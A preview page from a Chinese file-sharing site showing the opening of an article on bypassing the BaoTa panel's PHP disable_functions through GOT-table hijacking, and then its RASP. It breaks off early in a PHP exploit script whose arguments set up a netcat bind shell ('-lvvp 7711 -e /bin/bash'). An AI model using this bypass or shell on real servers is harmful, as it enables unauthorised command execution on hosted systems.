没有合适的资源?快使用搜索试试~ 我知道了~
针对宝塔的RASP及其disable_functions的绕过1
需积分: 0 1 下载量 45 浏览量
2022-08-03
13:12:12
上传
评论
收藏 1.19MB PDF 举报
温馨提示
试读
16页
针对宝塔的RASP及其disable_functions的绕过1
资源详情
资源评论
资源推荐
/
针对宝塔的RASP及其disable_functions的绕过
来自专辑
原创技术干货
0x01 实验环境
开启宝塔自带的防跨站攻击。
安装并开启堡塔PHP安全防护。
安装并开启堡塔防提权。
0x02 概述
无聊的时候和宝塔开发聊天,听他说了宝塔在开发一个基于底层的rasp,拦截所有基于www权限的命令执行。最近总算上线了,我稍微测试了一下,效果确
实不错:
不管是通过php来调用system,会拦截,你是root权限的
情况下,通过su www都会被一并拦截,也就是说www基本什么也做不了,我一开始还挺惊讶这php居然没崩溃还能运行,开发说加了特殊的兼容,这就让
我感兴趣了。在加上业内知名的最全disable_functions名单,成功吸引了我来挑战。
主要挑战内容就是在他们的防跨站,也就是在他们的open_basedir限制了目录的情况下,先突破 disable_functions,然后在突破他们的rasp。
原创
芝士狍子糕 昨天xray社区
/
0x03 如何通过劫持GOT表绕过 disable_functions
在突破rasp前,我们首先得先能碰到rasp,不然disable_functions都过不去,何来绕过rasp之说。
什么是GOT表?
请自行阅读以下资料了解
1. 浅 析ELF中的GOT与PLT
2. 深入了解GOT,PLT和动态链接
3. 漏洞利用-GOT覆写技术
4. Linux中的GOT和PLT到底是个啥?
简单来说,某个程序需要调用printf这个函数,先到plt表里面找到对应的got表的里面存放的真正代码块的地址,在根据这个地址跳转到代码块。plt表是不
可写的,got表可写,在没有执行之前填充00,在执行的时候由动态连接器填充真正的函数地址进去。假如我们能找到got表的地址,修改他指向的地址,比
如把printf的地址和system的地址互换,就会造成我们调用的是printf,但实际上执行的是system,以此来突破disable_functions。
实现
1
2
3
4
5
6
7
8
9
10
11
12
<?php /***
*
* BUG
修
正
请
联
系
我
* @author
* @email xiaozeend@pm.me *
*/
$path="/tmp/ncc";
$args = " -lvvp 7711 -e /bin/bash";
/**
section tables type
*/
define('SHT_NULL',0);
/
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
define('SHT_PROGBITS',1);
define('SHT_SYMTAB',2);
define('SHT_STRTAB',3);
define('SHT_RELA',4);
define('SHT_HASH',5);
define('SHT_DYNAMIC',6);
define('SHT_NOTE',7);
define('SHT_NOBITS',8);
define('SHT_REL',9);
define('SHT_SHLIB',10);
define('SHT_DNYSYM',11);
define('SHT_INIT_ARRAY',14);
define('SHT_FINI_ARRAY',15);
//why does section tables have so many fuck type
define('SHT_GNU_HASH',0x6ffffff6);
define('SHT_GNU_versym',0x6fffffff);
define('SHT_GNU_verneed',0x6ffffffe);
class elf{
private $elf_bin;
private $strtab_section=array();
private $rel_plt_section=array();
private $dynsym_section=array();
public $shared_librarys=array();
public $rel_plts=array();
public function getElfBin()
{
return $this->elf_bin;
剩余15页未读,继续阅读
咖啡碎冰冰
- 粉丝: 11
- 资源: 292
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0